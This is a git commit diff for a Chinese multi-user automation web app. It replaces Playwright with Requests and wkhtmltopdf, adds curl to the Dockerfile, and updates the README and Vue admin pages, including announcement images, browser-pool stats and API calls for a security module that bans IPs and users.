feat: 添加安全模块 + Dockerfile添加curl支持健康检查

主要更新:
- 新增 security/ 安全模块 (风险评估、威胁检测、蜜罐等)
- Dockerfile 添加 curl 以支持 Docker 健康检查
- 前端页面更新 (管理后台、用户端)
- 数据库迁移和 schema 更新
- 新增 kdocs 上传服务
- 添加安全相关测试用例

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
Yu Yon
2026-01-08 17:48:33 +08:00
parent e3b0c35da6
commit 53c78e8e3c
76 changed files with 8563 additions and 4709 deletions

View File

@@ -1,14 +1,18 @@
# 使用国内镜像源加速 # 使用国内镜像源加速
FROM mcr.microsoft.com/playwright/python:v1.40.0-jammy FROM python:3.10-slim-bullseye
# 设置工作目录 # 设置工作目录
WORKDIR /app WORKDIR /app
# 设置环境变量 # 设置环境变量
ENV PYTHONUNBUFFERED=1 ENV PYTHONUNBUFFERED=1
ENV PLAYWRIGHT_BROWSERS_PATH=/ms-playwright
ENV TZ=Asia/Shanghai ENV TZ=Asia/Shanghai
# 安装 wkhtmltopdf包含 wkhtmltoimage与中文字体
RUN apt-get update && \
apt-get install -y --no-install-recommends wkhtmltopdf curl fonts-noto-cjk && \
rm -rf /var/lib/apt/lists/*
# 配置 pip 使用国内镜像源 # 配置 pip 使用国内镜像源
RUN pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/ && pip config set install.trusted-host mirrors.aliyun.com RUN pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/ && pip config set install.trusted-host mirrors.aliyun.com
@@ -18,14 +22,15 @@ COPY requirements.txt .
# 安装Python依赖 # 安装Python依赖
RUN pip install --no-cache-dir -r requirements.txt RUN pip install --no-cache-dir -r requirements.txt
# 安装 Playwright 浏览器依赖与 Chromium
RUN python -m playwright install --with-deps chromium
# 复制应用程序文件 # 复制应用程序文件
COPY app.py . COPY app.py .
COPY database.py . COPY database.py .
COPY db_pool.py . COPY db_pool.py .
COPY playwright_automation.py .
COPY api_browser.py . COPY api_browser.py .
COPY browser_pool_worker.py . COPY browser_pool_worker.py .
COPY browser_installer.py .
COPY password_utils.py . COPY password_utils.py .
COPY crypto_utils.py . COPY crypto_utils.py .
COPY task_checkpoint.py . COPY task_checkpoint.py .
@@ -39,6 +44,7 @@ COPY routes/ ./routes/
COPY services/ ./services/ COPY services/ ./services/
COPY realtime/ ./realtime/ COPY realtime/ ./realtime/
COPY db/ ./db/ COPY db/ ./db/
COPY security/ ./security/
COPY templates/ ./templates/ COPY templates/ ./templates/
COPY static/ ./static/ COPY static/ ./static/

View File

@@ -6,10 +6,10 @@
## 项目简介 ## 项目简介
本项目是一个 **Docker 容器化应用**,使用 Flask + Playwright + SQLite 构建,提供: 本项目是一个 **Docker 容器化应用**,使用 Flask + Requests + wkhtmltopdf + SQLite 构建,提供:
- 多用户注册登录系统 - 多用户注册登录系统
- 浏览器自动化任务 - 自动化任务HTTP 模拟)
- 定时任务调度 - 定时任务调度
- 截图管理 - 截图管理
- VIP用户管理 - VIP用户管理
@@ -22,7 +22,8 @@
- **后端**: Python 3.8+, Flask - **后端**: Python 3.8+, Flask
- **数据库**: SQLite - **数据库**: SQLite
- **自动化**: Playwright (Chromium) - **自动化**: Requests + BeautifulSoup
- **截图**: wkhtmltopdf / wkhtmltoimage
- **容器化**: Docker + Docker Compose - **容器化**: Docker + Docker Compose
- **前端**: HTML + JavaScript + Socket.IO - **前端**: HTML + JavaScript + Socket.IO
@@ -39,10 +40,8 @@ zsglpt/
├── database.py # 数据库稳定门面(对外 API ├── database.py # 数据库稳定门面(对外 API
├── db/ # DB 分域实现 + schema/migrations ├── db/ # DB 分域实现 + schema/migrations
├── db_pool.py # 数据库连接池 ├── db_pool.py # 数据库连接池
├── playwright_automation.py # Playwright 自动化
├── api_browser.py # Requests 自动化(主浏览流程) ├── api_browser.py # Requests 自动化(主浏览流程)
├── browser_pool_worker.py # 截图 WorkerPool(浏览器复用) ├── browser_pool_worker.py # 截图 WorkerPool
├── browser_installer.py # 浏览器安装检查
├── app_config.py # 配置管理 ├── app_config.py # 配置管理
├── app_logger.py # 日志系统 ├── app_logger.py # 日志系统
├── app_security.py # 安全模块 ├── app_security.py # 安全模块
@@ -122,8 +121,8 @@ cd /www/wwwroot/zsgpt2
### 步骤4: 创建必要的目录 ### 步骤4: 创建必要的目录
```bash ```bash
mkdir -p data logs 截图 playwright mkdir -p data logs 截图
chmod 777 data logs 截图 playwright chmod 777 data logs 截图
``` ```
### 步骤5: 构建并启动Docker容器 ### 步骤5: 构建并启动Docker容器
@@ -447,19 +446,19 @@ docker-compose down
docker-compose up -d docker-compose up -d
``` ```
### 5. 浏览器下载失败 ### 5. 截图工具未安装
**问题**: Playwright浏览器下载失败 **问题**: wkhtmltoimage 命令不存在
**解决方案**: **解决方案**:
```bash ```bash
# 进入容器手动安装 # 进入容器手动安装
docker exec -it knowledge-automation-multiuser bash docker exec -it knowledge-automation-multiuser bash
playwright install chromium apt-get update
apt-get install -y wkhtmltopdf
# 或使用国内镜像 # 验证安装
export PLAYWRIGHT_DOWNLOAD_HOST=https://npmmirror.com/mirrors/playwright/ wkhtmltoimage --version
playwright install chromium
``` ```
--- ---
@@ -631,7 +630,19 @@ docker logs knowledge-automation-multiuser | grep "数据库"
|--------|------|--------| |--------|------|--------|
| TZ | 时区 | Asia/Shanghai | | TZ | 时区 | Asia/Shanghai |
| PYTHONUNBUFFERED | Python输出缓冲 | 1 | | PYTHONUNBUFFERED | Python输出缓冲 | 1 |
| PLAYWRIGHT_BROWSERS_PATH | 浏览器路径 | /ms-playwright | | WKHTMLTOIMAGE_PATH | wkhtmltoimage 可执行文件路径 | 自动探测 |
| WKHTMLTOIMAGE_JS_DELAY_MS | JS 等待时间(毫秒) | 3000 |
| WKHTMLTOIMAGE_WIDTH | 截图宽度 | 1920 |
| WKHTMLTOIMAGE_HEIGHT | 截图高度(视口高度) | 1080 |
| WKHTMLTOIMAGE_FULL_PAGE | 是否输出全页截图(忽略视口高度/裁剪) | 0 |
| WKHTMLTOIMAGE_ZOOM | 渲染缩放比例 | 1.0 |
| WKHTMLTOIMAGE_CROP_WIDTH | 裁剪宽度0 表示不裁剪) | 默认跟随截图宽度 |
| WKHTMLTOIMAGE_CROP_HEIGHT | 裁剪高度0 表示不裁剪) | 默认跟随截图高度 |
| WKHTMLTOIMAGE_CROP_X | 裁剪起点 X | 0 |
| WKHTMLTOIMAGE_CROP_Y | 裁剪起点 Y | 0 |
| WKHTMLTOIMAGE_QUALITY | JPG截图质量 | 95 |
| WKHTMLTOIMAGE_TIMEOUT_SECONDS | 截图超时时间(秒) | 60 |
| WKHTMLTOIMAGE_USER_AGENT | 截图使用的 UA | Chrome 120 |
--- ---
@@ -641,13 +652,13 @@ docker logs knowledge-automation-multiuser | grep "数据库"
- **项目名称**: 知识管理平台自动化工具 - **项目名称**: 知识管理平台自动化工具
- **版本**: Docker 多用户版 - **版本**: Docker 多用户版
- **技术栈**: Python + Flask + Playwright + SQLite + Docker - **技术栈**: Python + Flask + Requests + wkhtmltopdf + SQLite + Docker
### 常用文档链接 ### 常用文档链接
- [Docker 官方文档](https://docs.docker.com/) - [Docker 官方文档](https://docs.docker.com/)
- [Flask 官方文档](https://flask.palletsprojects.com/) - [Flask 官方文档](https://flask.palletsprojects.com/)
- [Playwright 官方文档](https://playwright.dev/python/) - [wkhtmltopdf 官方文档](https://wkhtmltopdf.org/)
### 故障排查 ### 故障排查
@@ -683,8 +694,8 @@ ssh root@your-ip
# 3. 进入目录并创建必要目录 # 3. 进入目录并创建必要目录
cd /www/wwwroot/zsgpt2 cd /www/wwwroot/zsgpt2
mkdir -p data logs 截图 playwright mkdir -p data logs 截图
chmod 777 data logs 截图 playwright chmod 777 data logs 截图
# 4. 启动容器 # 4. 启动容器
docker-compose up -d docker-compose up -d

View File

@@ -10,6 +10,13 @@ export async function createAnnouncement(payload) {
return data return data
} }
export async function uploadAnnouncementImage(file) {
const formData = new FormData()
formData.append('file', file)
const { data } = await api.post('/announcements/upload_image', formData)
return data
}
export async function activateAnnouncement(id) { export async function activateAnnouncement(id) {
const { data } = await api.post(`/announcements/${id}/activate`) const { data } = await api.post(`/announcements/${id}/activate`)
return data return data
@@ -24,4 +31,3 @@ export async function deleteAnnouncement(id) {
const { data } = await api.delete(`/announcements/${id}`) const { data } = await api.delete(`/announcements/${id}`)
return data return data
} }

View File

@@ -0,0 +1,7 @@
import { api } from './client'
export async function fetchBrowserPoolStats() {
const { data } = await api.get('/browser_pool/stats')
return data
}

View File

@@ -0,0 +1,17 @@
import { api } from './client'
export async function fetchKdocsStatus(params = {}) {
const { data } = await api.get('/kdocs/status', { params })
return data
}
export async function fetchKdocsQr(payload = {}) {
const body = { force: true, ...payload }
const { data } = await api.post('/kdocs/qr', body)
return data
}
export async function clearKdocsLogin() {
const { data } = await api.post('/kdocs/clear-login', {})
return data
}

View File

@@ -0,0 +1,63 @@
import { api } from './client'
export async function getDashboard() {
const { data } = await api.get('/admin/security/dashboard')
return data
}
export async function getThreats(params) {
const { data } = await api.get('/admin/security/threats', { params })
return data
}
export async function getBannedIps() {
const { data } = await api.get('/admin/security/banned-ips')
return data
}
export async function getBannedUsers() {
const { data } = await api.get('/admin/security/banned-users')
return data
}
export async function banIp(payload) {
const { data } = await api.post('/admin/security/ban-ip', payload)
return data
}
export async function unbanIp(ip) {
const { data } = await api.post('/admin/security/unban-ip', { ip })
return data
}
export async function banUser(payload) {
const { data } = await api.post('/admin/security/ban-user', payload)
return data
}
export async function unbanUser(userId) {
const { data } = await api.post('/admin/security/unban-user', { user_id: userId })
return data
}
export async function getIpRisk(ip) {
const safeIp = encodeURIComponent(String(ip || '').trim())
const { data } = await api.get(`/admin/security/ip-risk/${safeIp}`)
return data
}
export async function clearIpRisk(ip) {
const { data } = await api.post('/admin/security/ip-risk/clear', { ip })
return data
}
export async function getUserRisk(userId) {
const safeUserId = encodeURIComponent(String(userId || '').trim())
const { data } = await api.get(`/admin/security/user-risk/${safeUserId}`)
return data
}
export async function cleanup() {
const { data } = await api.post('/admin/security/cleanup', {})
return data
}

View File

@@ -7,6 +7,7 @@ import {
ChatLineSquare, ChatLineSquare,
Document, Document,
List, List,
Lock,
Message, Message,
Setting, Setting,
Tools, Tools,
@@ -15,7 +16,6 @@ import {
import { api } from '../api/client' import { api } from '../api/client'
import { fetchFeedbackStats } from '../api/feedbacks' import { fetchFeedbackStats } from '../api/feedbacks'
import { fetchPasswordResets } from '../api/passwordResets'
import { fetchSystemStats } from '../api/stats' import { fetchSystemStats } from '../api/stats'
const route = useRoute() const route = useRoute()
@@ -33,15 +33,11 @@ async function refreshStats() {
} }
const loadingBadges = ref(false) const loadingBadges = ref(false)
const pendingResetsCount = ref(0)
const pendingFeedbackCount = ref(0) const pendingFeedbackCount = ref(0)
let badgeTimer let badgeTimer
async function refreshNavBadges(partial = null) { async function refreshNavBadges(partial = null) {
if (partial && typeof partial === 'object') { if (partial && typeof partial === 'object') {
if (Object.prototype.hasOwnProperty.call(partial, 'pendingResets')) {
pendingResetsCount.value = Number(partial.pendingResets || 0)
}
if (Object.prototype.hasOwnProperty.call(partial, 'pendingFeedbacks')) { if (Object.prototype.hasOwnProperty.call(partial, 'pendingFeedbacks')) {
pendingFeedbackCount.value = Number(partial.pendingFeedbacks || 0) pendingFeedbackCount.value = Number(partial.pendingFeedbacks || 0)
} }
@@ -52,18 +48,8 @@ async function refreshNavBadges(partial = null) {
loadingBadges.value = true loadingBadges.value = true
try { try {
const [resetsResult, feedbackResult] = await Promise.allSettled([ const feedbackResult = await fetchFeedbackStats()
fetchPasswordResets(), pendingFeedbackCount.value = Number(feedbackResult?.pending || 0)
fetchFeedbackStats(),
])
if (resetsResult.status === 'fulfilled') {
pendingResetsCount.value = Array.isArray(resetsResult.value) ? resetsResult.value.length : 0
}
if (feedbackResult.status === 'fulfilled') {
pendingFeedbackCount.value = Number(feedbackResult.value?.pending || 0)
}
} finally { } finally {
loadingBadges.value = false loadingBadges.value = false
} }
@@ -99,11 +85,12 @@ onBeforeUnmount(() => {
const menuItems = [ const menuItems = [
{ path: '/reports', label: '报表', icon: Document }, { path: '/reports', label: '报表', icon: Document },
{ path: '/users', label: '用户', icon: User, badgeKey: 'resets' }, { path: '/users', label: '用户', icon: User },
{ path: '/feedbacks', label: '反馈', icon: ChatLineSquare, badgeKey: 'feedbacks' }, { path: '/feedbacks', label: '反馈', icon: ChatLineSquare, badgeKey: 'feedbacks' },
{ path: '/logs', label: '任务日志', icon: List }, { path: '/logs', label: '任务日志', icon: List },
{ path: '/announcements', label: '公告', icon: Bell }, { path: '/announcements', label: '公告', icon: Bell },
{ path: '/email', label: '邮件', icon: Message }, { path: '/email', label: '邮件', icon: Message },
{ path: '/security', label: '安全防护', icon: Lock },
{ path: '/system', label: '系统配置', icon: Tools }, { path: '/system', label: '系统配置', icon: Tools },
{ path: '/settings', label: '设置', icon: Setting }, { path: '/settings', label: '设置', icon: Setting },
] ]
@@ -112,7 +99,6 @@ const activeMenu = computed(() => route.path)
function badgeFor(item) { function badgeFor(item) {
if (!item?.badgeKey) return 0 if (!item?.badgeKey) return 0
if (item.badgeKey === 'resets') return Number(pendingResetsCount.value || 0)
if (item.badgeKey === 'feedbacks') { if (item.badgeKey === 'feedbacks') {
return Number(pendingFeedbackCount.value || 0) return Number(pendingFeedbackCount.value || 0)
} }

View File

@@ -1,6 +1,7 @@
<script setup> <script setup>
import { onMounted, ref } from 'vue' import { h, onMounted, ref } from 'vue'
import { ElMessage, ElMessageBox } from 'element-plus' import { ElMessage, ElMessageBox } from 'element-plus'
import { Plus } from '@element-plus/icons-vue'
import { import {
activateAnnouncement, activateAnnouncement,
@@ -8,10 +9,14 @@ import {
deactivateAnnouncement, deactivateAnnouncement,
deleteAnnouncement, deleteAnnouncement,
fetchAnnouncements, fetchAnnouncements,
uploadAnnouncementImage,
} from '../api/announcements' } from '../api/announcements'
const formTitle = ref('') const formTitle = ref('')
const formContent = ref('') const formContent = ref('')
const formImageUrl = ref('')
const imageInputRef = ref(null)
const uploading = ref(false)
const loading = ref(false) const loading = ref(false)
const list = ref([]) const list = ref([])
@@ -30,18 +35,56 @@ async function load() {
function clearForm() { function clearForm() {
formTitle.value = '' formTitle.value = ''
formContent.value = '' formContent.value = ''
formImageUrl.value = ''
if (imageInputRef.value) imageInputRef.value.value = ''
}
function openImagePicker() {
imageInputRef.value?.click()
}
function clearImage() {
formImageUrl.value = ''
if (imageInputRef.value) imageInputRef.value.value = ''
}
async function onImageFileChange(event) {
const file = event.target?.files?.[0]
if (!file) return
if (file.type && !file.type.startsWith('image/')) {
ElMessage.error('请选择图片文件')
event.target.value = ''
return
}
uploading.value = true
try {
const res = await uploadAnnouncementImage(file)
if (!res?.success || !res?.url) {
ElMessage.error(res?.error || '上传失败')
return
}
formImageUrl.value = res.url
ElMessage.success('上传成功')
} catch {
// handled by interceptor
} finally {
uploading.value = false
event.target.value = ''
}
} }
async function submit(isActive) { async function submit(isActive) {
const title = formTitle.value.trim() const title = formTitle.value.trim()
const content = formContent.value.trim() const content = formContent.value.trim()
const image_url = formImageUrl.value.trim()
if (!title || !content) { if (!title || !content) {
ElMessage.error('标题和内容不能为空') ElMessage.error('标题和内容不能为空')
return return
} }
try { try {
const res = await createAnnouncement({ title, content, is_active: Boolean(isActive) }) const res = await createAnnouncement({ title, content, image_url, is_active: Boolean(isActive) })
if (!res?.success) { if (!res?.success) {
ElMessage.error(res?.error || '保存失败') ElMessage.error(res?.error || '保存失败')
return return
@@ -55,7 +98,17 @@ async function submit(isActive) {
} }
async function view(row) { async function view(row) {
await ElMessageBox.alert(row.content || '', row.title || '公告', { const body = h('div', { class: 'announcement-view' }, [
row.content ? h('div', { class: 'announcement-view-text' }, row.content) : null,
row.image_url
? h('img', {
class: 'announcement-view-image',
src: row.image_url,
alt: '公告图片',
})
: null,
])
await ElMessageBox.alert(body, row.title || '公告', {
confirmButtonText: '关闭', confirmButtonText: '关闭',
dangerouslyUseHTMLString: false, dangerouslyUseHTMLString: false,
}) })
@@ -162,8 +215,26 @@ onMounted(load)
show-word-limit show-word-limit
/> />
</el-form-item> </el-form-item>
<el-form-item label="公告图片">
<div class="image-upload-row">
<el-button :icon="Plus" :loading="uploading" @click="openImagePicker">上传图片</el-button>
<el-button v-if="formImageUrl" @click="clearImage">移除</el-button>
<span v-if="formImageUrl" class="image-url">{{ formImageUrl }}</span>
<input
ref="imageInputRef"
class="image-input"
type="file"
accept="image/*"
@change="onImageFileChange"
/>
</div>
</el-form-item>
</el-form> </el-form>
<div v-if="formImageUrl" class="image-preview">
<img :src="formImageUrl" alt="公告图片预览" />
</div>
<div class="actions"> <div class="actions">
<el-button type="primary" @click="submit(true)">发布并启用</el-button> <el-button type="primary" @click="submit(true)">发布并启用</el-button>
<el-button @click="submit(false)">保存但不启用</el-button> <el-button @click="submit(false)">保存但不启用</el-button>
@@ -193,6 +264,12 @@ onMounted(load)
</el-tag> </el-tag>
</template> </template>
</el-table-column> </el-table-column>
<el-table-column label="图片" width="100">
<template #default="{ row }">
<el-tag v-if="row.image_url" type="success" effect="light">有图</el-tag>
<span v-else class="app-muted">-</span>
</template>
</el-table-column>
<el-table-column prop="created_at" label="创建时间" width="180" /> <el-table-column prop="created_at" label="创建时间" width="180" />
<el-table-column label="操作" width="260" fixed="right"> <el-table-column label="操作" width="260" fixed="right">
<template #default="{ row }"> <template #default="{ row }">
@@ -234,6 +311,57 @@ onMounted(load)
color: var(--app-muted); color: var(--app-muted);
} }
.image-preview {
margin: 6px 0 2px;
display: flex;
justify-content: flex-start;
}
.image-preview img {
max-width: 280px;
max-height: 160px;
border-radius: 8px;
border: 1px solid var(--app-border);
object-fit: contain;
}
.image-upload-row {
display: flex;
align-items: center;
gap: 10px;
flex-wrap: wrap;
}
.image-input {
display: none;
}
.image-url {
font-size: 12px;
color: var(--app-muted);
word-break: break-all;
}
.announcement-view {
display: flex;
flex-direction: column;
gap: 12px;
}
.announcement-view-text {
white-space: pre-wrap;
line-height: 1.6;
font-size: 14px;
}
.announcement-view-image {
max-width: 100%;
max-height: 320px;
border-radius: 10px;
border: 1px solid var(--app-border);
object-fit: contain;
}
.table-wrap { .table-wrap {
overflow-x: auto; overflow-x: auto;
} }
@@ -252,4 +380,3 @@ onMounted(load)
gap: 8px; gap: 8px;
} }
</style> </style>

View File

@@ -21,6 +21,7 @@ const settings = reactive({
enabled: false, enabled: false,
failover_enabled: true, failover_enabled: true,
register_verify_enabled: false, register_verify_enabled: false,
login_alert_enabled: true,
task_notify_enabled: false, task_notify_enabled: false,
base_url: '', base_url: '',
updated_at: null, updated_at: null,
@@ -35,6 +36,7 @@ async function loadEmailSettings() {
settings.enabled = Boolean(data.enabled) settings.enabled = Boolean(data.enabled)
settings.failover_enabled = Boolean(data.failover_enabled) settings.failover_enabled = Boolean(data.failover_enabled)
settings.register_verify_enabled = Boolean(data.register_verify_enabled) settings.register_verify_enabled = Boolean(data.register_verify_enabled)
settings.login_alert_enabled = data.login_alert_enabled === undefined ? true : Boolean(data.login_alert_enabled)
settings.task_notify_enabled = Boolean(data.task_notify_enabled) settings.task_notify_enabled = Boolean(data.task_notify_enabled)
settings.base_url = data.base_url || '' settings.base_url = data.base_url || ''
settings.updated_at = data.updated_at || null settings.updated_at = data.updated_at || null
@@ -53,6 +55,7 @@ async function saveEmailSettings() {
enabled: settings.enabled, enabled: settings.enabled,
failover_enabled: settings.failover_enabled, failover_enabled: settings.failover_enabled,
register_verify_enabled: settings.register_verify_enabled, register_verify_enabled: settings.register_verify_enabled,
login_alert_enabled: settings.login_alert_enabled,
task_notify_enabled: settings.task_notify_enabled, task_notify_enabled: settings.task_notify_enabled,
base_url: (settings.base_url || '').trim(), base_url: (settings.base_url || '').trim(),
}) })
@@ -597,6 +600,8 @@ onMounted(refreshAll)
@change="scheduleSaveEmailSettings" @change="scheduleSaveEmailSettings"
/> />
</el-form-item> </el-form-item>
<el-divider content-position="left">通知设置</el-divider>
<el-form-item label="启用任务完成通知"> <el-form-item label="启用任务完成通知">
<el-switch <el-switch
v-model="settings.task_notify_enabled" v-model="settings.task_notify_enabled"
@@ -604,6 +609,14 @@ onMounted(refreshAll)
@change="scheduleSaveEmailSettings" @change="scheduleSaveEmailSettings"
/> />
</el-form-item> </el-form-item>
<el-form-item label="新设备登录提醒">
<el-switch
v-model="settings.login_alert_enabled"
:disabled="emailSettingsSaving"
@change="scheduleSaveEmailSettings"
/>
<div class="help">当检测到新设备或新IP登录时发送邮件提醒用户</div>
</el-form-item>
<el-form-item label="网站基础URL"> <el-form-item label="网站基础URL">
<el-input <el-input
v-model="settings.base_url" v-model="settings.base_url"

View File

@@ -1,12 +1,11 @@
<script setup> <script setup>
import { computed, inject, onMounted, ref } from 'vue' import { computed, inject, onMounted, onUnmounted, ref } from 'vue'
import { import {
Calendar, Calendar,
ChatLineSquare, ChatLineSquare,
Clock, Clock,
Cpu, Cpu,
Key, Key,
Lock,
Loading, Loading,
Message, Message,
Star, Star,
@@ -18,16 +17,15 @@ import {
import { fetchFeedbackStats } from '../api/feedbacks' import { fetchFeedbackStats } from '../api/feedbacks'
import { fetchEmailStats } from '../api/email' import { fetchEmailStats } from '../api/email'
import { fetchPasswordResets } from '../api/passwordResets'
import { fetchDockerStats, fetchRunningTasks, fetchServerInfo, fetchTaskStats } from '../api/tasks' import { fetchDockerStats, fetchRunningTasks, fetchServerInfo, fetchTaskStats } from '../api/tasks'
import { fetchBrowserPoolStats } from '../api/browser_pool'
import { fetchSystemConfig } from '../api/system' import { fetchSystemConfig } from '../api/system'
import { fetchUpdateResult, fetchUpdateStatus } from '../api/update'
const refreshStats = inject('refreshStats', null) const refreshStats = inject('refreshStats', null)
const adminStats = inject('adminStats', null) const adminStats = inject('adminStats', null)
const refreshNavBadges = inject('refreshNavBadges', null)
const loading = ref(false) const loading = ref(false)
const refreshing = ref(false)
const lastUpdatedAt = ref('') const lastUpdatedAt = ref('')
const taskStats = ref(null) const taskStats = ref(null)
@@ -36,11 +34,8 @@ const emailStats = ref(null)
const feedbackStats = ref(null) const feedbackStats = ref(null)
const serverInfo = ref(null) const serverInfo = ref(null)
const dockerStats = ref(null) const dockerStats = ref(null)
const browserPoolStats = ref(null)
const systemConfig = ref(null) const systemConfig = ref(null)
const updateStatus = ref(null)
const updateStatusError = ref('')
const updateResult = ref(null)
const passwordResetsCount = ref(0)
const queueTab = ref('running') const queueTab = ref('running')
function recordUpdatedAt() { function recordUpdatedAt() {
@@ -67,12 +62,6 @@ function parsePercent(value) {
return n return n
} }
function shortCommit(value) {
const text = String(value ?? '').trim()
if (!text) return '-'
return text.length > 12 ? `${text.slice(0, 12)}` : text
}
function sourceLabel(source) { function sourceLabel(source) {
const raw = String(source ?? '').trim() const raw = String(source ?? '').trim()
if (!raw) return '手动' if (!raw) return '手动'
@@ -101,7 +90,6 @@ const overviewCards = computed(() => {
sub: liveMax ? `并发上限 ${liveMax}` : '', sub: liveMax ? `并发上限 ${liveMax}` : '',
}, },
{ label: '排队任务', value: normalizeCount(runningTasks.value?.queuing_count), icon: Clock, tone: 'purple' }, { label: '排队任务', value: normalizeCount(runningTasks.value?.queuing_count), icon: Clock, tone: 'purple' },
{ label: '密码重置待处理', value: normalizeCount(passwordResetsCount.value), icon: Lock, tone: 'red' },
] ]
}) })
@@ -112,6 +100,40 @@ const queuingTaskList = computed(() => runningTasks.value?.queuing || [])
const runningCount = computed(() => normalizeCount(runningTasks.value?.running_count)) const runningCount = computed(() => normalizeCount(runningTasks.value?.running_count))
const queuingCount = computed(() => normalizeCount(runningTasks.value?.queuing_count)) const queuingCount = computed(() => normalizeCount(runningTasks.value?.queuing_count))
const browserPoolWorkers = computed(() => {
const workers = browserPoolStats.value?.workers
if (!Array.isArray(workers)) return []
return [...workers].sort((a, b) => normalizeCount(a?.worker_id) - normalizeCount(b?.worker_id))
})
const browserPoolTotalWorkers = computed(() => normalizeCount(browserPoolStats.value?.total_workers))
const browserPoolActiveWorkers = computed(() => browserPoolWorkers.value.filter((w) => Boolean(w?.has_browser)).length)
const browserPoolIdleWorkers = computed(() => normalizeCount(browserPoolStats.value?.idle_workers))
const browserPoolQueueSize = computed(() => normalizeCount(browserPoolStats.value?.queue_size))
const browserPoolBusyWorkers = computed(() => normalizeCount(browserPoolStats.value?.active_workers))
function workerPoolStatusType(worker) {
if (!worker?.thread_alive) return 'danger'
if (worker?.has_browser) return 'success'
return 'info'
}
function workerPoolStatusLabel(worker) {
if (!worker?.thread_alive) return '异常'
if (worker?.has_browser) return '活跃'
return '空闲'
}
function workerRunTagType(worker) {
if (!worker?.thread_alive) return 'danger'
return worker?.idle ? 'info' : 'warning'
}
function workerRunLabel(worker) {
if (!worker?.thread_alive) return '停止'
return worker?.idle ? '空闲' : '忙碌'
}
const taskTodaySuccessRate = computed(() => { const taskTodaySuccessRate = computed(() => {
const success = normalizeCount(taskToday.value.success_tasks) const success = normalizeCount(taskToday.value.success_tasks)
const failed = normalizeCount(taskToday.value.failed_tasks) const failed = normalizeCount(taskToday.value.failed_tasks)
@@ -160,71 +182,70 @@ const runningCountsLabel = computed(() => {
return `运行中 ${runningCount} / 排队 ${queuingCount} / 并发上限 ${maxGlobal || maxConcurrentGlobal.value || '-'}` return `运行中 ${runningCount} / 排队 ${queuingCount} / 并发上限 ${maxGlobal || maxConcurrentGlobal.value || '-'}`
}) })
const updateAvailable = computed(() => Boolean(updateStatus.value?.update_available)) async function refreshAll(options = {}) {
const updateRunning = computed(() => updateResult.value?.status === 'running') const showLoading = options.showLoading ?? true
if (refreshing.value) return
async function refreshAll() { refreshing.value = true
if (loading.value) return if (showLoading) {
loading.value = true loading.value = true
}
try { try {
const [ const [
taskResult, taskResult,
runningResult, runningResult,
emailResult, emailResult,
feedbackResult, feedbackResult,
resetsResult,
serverResult, serverResult,
dockerResult, dockerResult,
browserPoolResult,
configResult, configResult,
updateStatusResult,
updateResultResult,
] = await Promise.allSettled([ ] = await Promise.allSettled([
fetchTaskStats(), fetchTaskStats(),
fetchRunningTasks(), fetchRunningTasks(),
fetchEmailStats(), fetchEmailStats(),
fetchFeedbackStats(), fetchFeedbackStats(),
fetchPasswordResets(),
fetchServerInfo(), fetchServerInfo(),
fetchDockerStats(), fetchDockerStats(),
fetchBrowserPoolStats(),
fetchSystemConfig(), fetchSystemConfig(),
fetchUpdateStatus(),
fetchUpdateResult(),
]) ])
taskStats.value = taskResult.status === 'fulfilled' ? taskResult.value : null taskStats.value = taskResult.status === 'fulfilled' ? taskResult.value : null
runningTasks.value = runningResult.status === 'fulfilled' ? runningResult.value : null runningTasks.value = runningResult.status === 'fulfilled' ? runningResult.value : null
emailStats.value = emailResult.status === 'fulfilled' ? emailResult.value : null emailStats.value = emailResult.status === 'fulfilled' ? emailResult.value : null
feedbackStats.value = feedbackResult.status === 'fulfilled' ? feedbackResult.value : null feedbackStats.value = feedbackResult.status === 'fulfilled' ? feedbackResult.value : null
passwordResetsCount.value = resetsResult.status === 'fulfilled' ? (Array.isArray(resetsResult.value) ? resetsResult.value.length : 0) : 0
serverInfo.value = serverResult.status === 'fulfilled' ? serverResult.value : null serverInfo.value = serverResult.status === 'fulfilled' ? serverResult.value : null
dockerStats.value = dockerResult.status === 'fulfilled' ? dockerResult.value : null dockerStats.value = dockerResult.status === 'fulfilled' ? dockerResult.value : null
browserPoolStats.value = browserPoolResult.status === 'fulfilled' ? browserPoolResult.value : null
systemConfig.value = configResult.status === 'fulfilled' ? configResult.value : null systemConfig.value = configResult.status === 'fulfilled' ? configResult.value : null
if (updateStatusResult.status === 'fulfilled') {
const res = updateStatusResult.value
if (res?.ok) {
updateStatus.value = res.data || null
updateStatusError.value = ''
} else {
updateStatus.value = null
updateStatusError.value = res?.error || '未发现更新状态Update-Agent 可能未运行)'
}
} else {
updateStatus.value = null
updateStatusError.value = ''
}
updateResult.value = updateResultResult.status === 'fulfilled' && updateResultResult.value?.ok ? updateResultResult.value.data : null
await refreshNavBadges?.({ pendingResets: passwordResetsCount.value })
await refreshStats?.() await refreshStats?.()
recordUpdatedAt() recordUpdatedAt()
} finally { } finally {
refreshing.value = false
if (showLoading) {
loading.value = false loading.value = false
} }
} }
}
onMounted(refreshAll) let refreshTimer = null
function manualRefresh() {
return refreshAll({ showLoading: true })
}
onMounted(() => {
refreshAll({ showLoading: false })
refreshTimer = setInterval(() => refreshAll({ showLoading: false }), 1000)
})
onUnmounted(() => {
if (refreshTimer) {
clearInterval(refreshTimer)
refreshTimer = null
}
})
</script> </script>
<template> <template>
@@ -234,10 +255,6 @@ onMounted(refreshAll)
<div class="hero-title"> <div class="hero-title">
<div class="hero-title-row"> <div class="hero-title-row">
<h2>报表中心</h2> <h2>报表中心</h2>
<el-tag v-if="updateStatusError" type="info" effect="dark">更新状态未知</el-tag>
<el-tag v-else-if="updateAvailable" type="warning" effect="dark">新版本可更新</el-tag>
<el-tag v-else type="success" effect="dark">已是最新</el-tag>
<el-tag v-if="updateRunning" type="warning" effect="plain">更新中</el-tag>
</div> </div>
<div class="hero-meta app-muted"> <div class="hero-meta app-muted">
<span v-if="lastUpdatedAt">更新时间{{ lastUpdatedAt }}</span> <span v-if="lastUpdatedAt">更新时间{{ lastUpdatedAt }}</span>
@@ -247,7 +264,7 @@ onMounted(refreshAll)
</div> </div>
<div class="hero-actions"> <div class="hero-actions">
<el-button type="primary" plain :loading="loading" @click="refreshAll">刷新</el-button> <el-button type="primary" plain :loading="loading" @click="manualRefresh">刷新</el-button>
</div> </div>
</div> </div>
@@ -582,6 +599,67 @@ onMounted(refreshAll)
